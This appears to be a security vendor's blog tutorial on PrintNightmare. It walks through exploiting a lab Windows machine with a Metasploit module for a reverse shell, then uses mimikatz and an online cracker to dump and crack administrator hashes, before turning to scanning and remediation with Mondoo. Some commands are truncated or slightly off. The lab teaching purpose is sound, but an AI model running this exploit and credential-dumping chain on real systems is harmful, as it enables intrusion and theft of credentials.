In simpler times, the biggest worries about the Windows Print Spooler were memory leaks and corrupted jobs. But in 2021, this service became a favorite pawn of some of the most destructive ransomware groups across the globe. A security researcher discovered a flaw in the Windows Print Spooler that allows a regular domain user to pose as SYSTEM and execute code on the domain controller. It became Windows vulnerability CVE-2021-34527 / KB5004948, commonly called PrintNightmare.
In this article, I'll walk you through the steps of hacking a Windows machine using the PrintNightmare vulnerability. And I'll show you how you can prevent vulnerabilities like PrintNightmare from inviting attackers into your infrastructure.
Hack a Windows system using PrintNightmare (CVE-2021-34527 / KB5004948)
To ethically penetrate a Windows system, we'll first create a lab environment and then perform the attack within that environment.
Deploy a Windows hacking lab
I created a Terraform template that makes it easy for you to deploy your own Windows hacking lab. This Terraform template deploys two virtual machines in your AWS account:
- A vulnerable Windows machine
- A Kali Linux machine that you'll use to attack the Windows machine
(We're deploying them in the same account just to make this process easy.)
Prerequisites
For this demonstration, you need:
- An AWS Account
- The AWS CLI installed and configured on your system
- Terraform installed on your system
- An AWS EC2 SSH RSA key pair configured
Configure your environment
Before provisioning, set these Terraform environment variables:
For example, I would open a terminal and run these commands:
export TF_VAR_region=us-east-1
export TF_VAR_demo_name=patrick
export TF_VAR_ssh_key=patrick-key
export TF_VAR_publicIP="1.1.1.1/32"
Provision a single environment
1. Clone the GitHub project:
git clone git@github.com:Lunalectric/windows-hack-demo.git
2. Change to the windows-hack-demo folder:
cd windows-hack-demo
3. Initialize the project (download the modules):
terraform init
4. Check that everything is ready:
terraform plan
5. Apply the configuration:
terraform apply -auto-approve
Once the provisioning completes, you see something like this:
Apply complete! Resources: 30 added, 0 changed, 0 destroyed.
Outputs:
hack_write_up = <<EOT
# Hack Windows machine
- login to your Kali machine
........
6. Build your hacking write-up, which is a set of instructions that generate specifically for you for this demonstration. It contains the exact commands to copy:
terraform output | sed "/^EOT/c\ " | sed "/hack_write_up = <<EOT/c\ " | sed 's/
Find and fix the security risks that pose the biggest threat to your business.
Exploit the PrintNightmare vulnerability in your hacking lab
Now that you've set up your hacking lab, let's hack into your lab's Windows machine using the PrintNightmare vulnerability. First you'll access the system, then you'll gain administrative control.
Hack into the Windows machine
1. In your terminal, connect to the Kali machine from which you'll do the hacking. Refer to your hack-write-up.md file for the address and password.
2. Open Metasploit (a popular, open source penetration testing tool):
msfconsole
3. When Metasploit finishes loading, retrieve the configuration to exploit the PrintNightmare vulnerability:
use exploit/windows/dcerpc/cve_2021_1675_printnightmare
4. Type `show options`:
5. You want to target the RHOSTS and passwords. Enter these commands in succession:
set RHOSTS 10.0.4.105
set SMBUSER mondoo
set SMBPASS mondoo.com
set payload windows/x64/
run
The Kali machine connects to a port and sends the malicious code to the Windows operating system. The code executes on the Windows machine and creates a reverse shell.
6. Check the IP address to make sure you’re connected: Type `ipconfig`. If the IP address matches the RHOSTS, you have a successful shell in the machine. You've hacked in!
Gain root privileges
Now that you're in, you can gain root privileges. (That's almost always an attacker's next step.)
1. To get the NTLM hash of the administrator profile, first enter:
powershell
2. Download mimikatz:
wget "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip" -outfile "C:\windows\temp\mimikatz_trunk.zip"
3. Follow these steps:
a. Change the working directory.
b. Decompress the zip file.
c. Change the working directory again.
d. Execute mimikatz.
e. Get the NTLM hash:
cd "C:\windows\temp\mimikatz_trunk.zip"
Expand-Archive mimikatz_trunk.zip -Force
cd mimikatz_trunk\x64
.\mimikatz.exe
sekurlsa::msv
4. Once you have the NTLM hash, go to crackstation.net and enter it in the Hash Cracker. Now you have the clear text admin password.
You've successfully used PrintNightmare to gain administrative access to the Windows system.
Identify security issues that allow attackers into Windows systems
Are you a little unnerved by how easy it was to penetrate and take control of a Windows machine? How confident are you that all of the Windows systems in your fleet are free of the PrintNightmare vulnerability? And what about the hundreds of other gaps in Windows security? How can you be sure that your infrastructure doesn't have security problems that can lead to a complete Windows compromise?
In this section, we'll take on the role of protector instead of hacker. I'll walk you through the process of identifying risks in your Windows systems.
Prerequisite
For this demonstration, you need:
- A Mondoo account. You can get one for free here.
Scan a Windows system
For this demonstration, I've set up a vagrant Windows machine that you can use.
1. Log in to the vagrant Windows 2016 system via Remote Desktop Protocol (RDP):
xfreerdp /u:Administrator /v::3389 /h:2048 /w:2048 /p:'Password1!'
2. Open Windows Powershell as an administrator.
3. Install Mondoo Client:
A. Log into your account at console.mondoo.com
B. Go to the INTEGRATIONS page and select Windows.
C. Set the Powershell execution policy:
Set-ExecutionPolicy RemoteSigned -scope CurrentUser
D. Copy the CLI commands that Mondoo provides and paste them in the Windows 2016 PowerShell.
E. After the Mondoo Client installation finishes, add the Mondoo path and type mondoo status to verify that Mondoo Client is registered and working. It should look like this:
PS C:\Users\Administrator> $env:Path = 'C:\Program Files\Mondoo\;' + $env:Path
PS C:\Users\Administrator> mondoo status
→ loaded configuration from C:\ProgramData\Mondoo\mondoo.yml using source default
! could not determine client platform information
→ Time: 2022-10-23T17:38:15Z
→ Version: 7.0.2 (API Version: 7)
→ API ConnectionConfig: https://us.api.mondoo.com
→ API Status: SERVING
→ API Time: 2022-10-23T17:38:15Z
→ API Version: 7
→ Space: //captain.api.mondoo.app/spaces/hardcore-bassi-588565
→ Client: //agents.api.mondoo.app/spaces/hardcore-bassi-588565/agents/2GXt8HJ0J8xG2xT4sTBUgtnY3nq
After a Windows restart, the installation path is automatically added to the PowerShell path variable.
F. Quickly verify that the following policies are enabled for your space:
- Platform Overview Information by Mondoo
- Platform End-of-Life Policy by Mondoo
- Platform Vulnerability Policy by Mondoo
- Windows Security by Mondoo
Your POLICY HUB should look like this:
3. Run the Mondoo scan in PowerShell:
mondoo scan local
Mondoo Client connects to the Mondoo backend and downloads the enabled policies. After the scan, Mondoo Client reports results back to the Mondoo backend.
Mondoo scan results
Explore scan results in Mondoo Console
First, lets find the PrintNightmare vulnerability.
1. Select the report URL to open the Mondoo asset overview page, which shows the Windows 2016 asset.
2. Select Platform Vulnerabilities and then select Advisories.
3. Search for KB5004948, which is the advisory for the PrintNightmare vulnerability we used earlier to access the windows machine.
Now let's look at the misconfiguration that allowed us to access to the NTLM hash of the administrator account:
1. On the Mondoo Console, select Policies and search for `Debug`.
2. Click to expand the control. You see the description of the problem and how to remediate it.
By default on a Windows machine, the SeDebug privilege right is active. Whoever has this right can dump the lsass.exe Windows process. This process caches the NTLM hashes that are used during an active session or from a service. It's this caching that allowed us to gain administrative control of the Windows system.
Mondoo finds vulnerabilities like PrintNightmare and misconfigurations like SeDebug throughout your entire infrastructure—not just on Windows systems but on every platform, container, and VM, and so much more. Use your Mondoo account to keep scanning and discover how you can harden your system security. If you have questions, we're here to help.